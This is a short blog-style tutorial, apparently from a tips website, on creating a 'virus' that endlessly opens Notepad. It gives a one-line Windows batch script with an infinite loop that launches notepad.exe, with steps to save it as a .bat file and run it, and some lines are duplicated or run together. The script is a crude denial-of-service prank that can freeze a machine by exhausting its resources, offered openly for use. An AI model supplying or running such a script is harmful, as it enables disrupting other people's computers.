How To Create Virus That Continuosly Opens Notepad
How To Create Virus That Continuously Opens Notepad
1. Click on Start-> Run -> Notepad.
1. Click on Start-> Run -> Notepad.
2. In Notepad Paste the following code.
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top3. Now Save the file with an extensiom.bat , for example: notepad.bat
4. If you click on notepad.bat , notepad will be opening continuously.
No comments:
Post a Comment